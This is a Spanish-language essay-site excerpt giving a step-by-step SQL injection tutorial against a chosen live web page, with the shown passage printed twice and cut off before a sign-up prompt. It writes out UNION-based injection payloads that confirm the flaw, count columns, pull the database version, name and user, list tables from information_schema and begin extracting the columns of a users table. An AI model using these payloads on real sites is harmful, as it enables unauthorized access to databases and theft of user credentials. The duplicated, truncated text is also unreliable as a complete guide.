Inyección sql
Páginas: 2 (462 palabras)
Publicado: 26 de octubre de 2014
Seleccionamos la página para atacar:
Para demostrar que es vulnerable agregamos un apostrofe a la URL después del id
Y nos manda un error de SQL, esto significa que esta lista para recibirnuestro ataque
Es hora de averiguar el numero de columnas en la base de datos así que agregaremos un order by a la URL comenzando por 1, hasta que mande un error
Y después del 7 nos manda nuevamenteel error.
Una vez identificadas las columnas debemos identificar cual es la columna vulnerable, para esto tenemos que remplazar el numero por negativo y agregar un UNION con el numero de columnasque encontramos anteriormente “7” quedará asi: -230 unión select 1,2,3,4,5,6,7—
Nos manda las columnas vulnerables: 4,2,7,5,6. Ahora tenemos que saber cual es la versión de SQL, para esto debemosingresar el comando versión() en el numero de la columna vulnerable, nosotros tenemos la columna 4, entonces quedará asi: -230 and 1=2 union select 1,2,3,version(),5,6,7—
Ahora el nombre de la basede datos con “database()”: -230 and 1=2 union select 1,2,3,database(),5,6,7--
Y el usuario con “user()”:-230 and 1=2 union select 1,2,3,user(),5,6,7--
Después de esto, ya que se esta usando unaversión mayor a 5 de SQL, solo agregaremos el siguiente código en el mismo lugar de la columna (4):
group_concat(table_name)
Y esto al final:
from information_schema.tables wheretable_schema=database()
Queda así: -230 and 1=2 union select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables where table_schema=database()—
Ahora vamos a sacar los campos de la tabla usuarios,para esto tenemos que agregar “group_concat(column_name)” y cambiar el from, por este: “from information_schema.columns where table_name=mysqlchar”
Ademas tenemos que cambiar el mysqlchar , para estodescargamos HackBar para Firefox, una vez instalado hacemos esto:
Ponemos en nombre de la tabla y copiamos el resultado, mismo que sustituiremos con mysqlchar
En mi caso es este::::Ahora una vez...
Para demostrar que es vulnerable agregamos un apostrofe a la URL después del id
Y nos manda un error de SQL, esto significa que esta lista para recibirnuestro ataque
Es hora de averiguar el numero de columnas en la base de datos así que agregaremos un order by a la URL comenzando por 1, hasta que mande un error
Y después del 7 nos manda nuevamenteel error.
Una vez identificadas las columnas debemos identificar cual es la columna vulnerable, para esto tenemos que remplazar el numero por negativo y agregar un UNION con el numero de columnasque encontramos anteriormente “7” quedará asi: -230 unión select 1,2,3,4,5,6,7—
Nos manda las columnas vulnerables: 4,2,7,5,6. Ahora tenemos que saber cual es la versión de SQL, para esto debemosingresar el comando versión() en el numero de la columna vulnerable, nosotros tenemos la columna 4, entonces quedará asi: -230 and 1=2 union select 1,2,3,version(),5,6,7—
Ahora el nombre de la basede datos con “database()”: -230 and 1=2 union select 1,2,3,database(),5,6,7--
Y el usuario con “user()”:-230 and 1=2 union select 1,2,3,user(),5,6,7--
Después de esto, ya que se esta usando unaversión mayor a 5 de SQL, solo agregaremos el siguiente código en el mismo lugar de la columna (4):
group_concat(table_name)
Y esto al final:
from information_schema.tables wheretable_schema=database()
Queda así: -230 and 1=2 union select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables where table_schema=database()—
Ahora vamos a sacar los campos de la tabla usuarios,para esto tenemos que agregar “group_concat(column_name)” y cambiar el from, por este: “from information_schema.columns where table_name=mysqlchar”
Ademas tenemos que cambiar el mysqlchar , para estodescargamos HackBar para Firefox, una vez instalado hacemos esto:
Ponemos en nombre de la tabla y copiamos el resultado, mismo que sustituiremos con mysqlchar
En mi caso es este::::Ahora una vez...
Leer documento completo
Regístrate para leer el documento completo.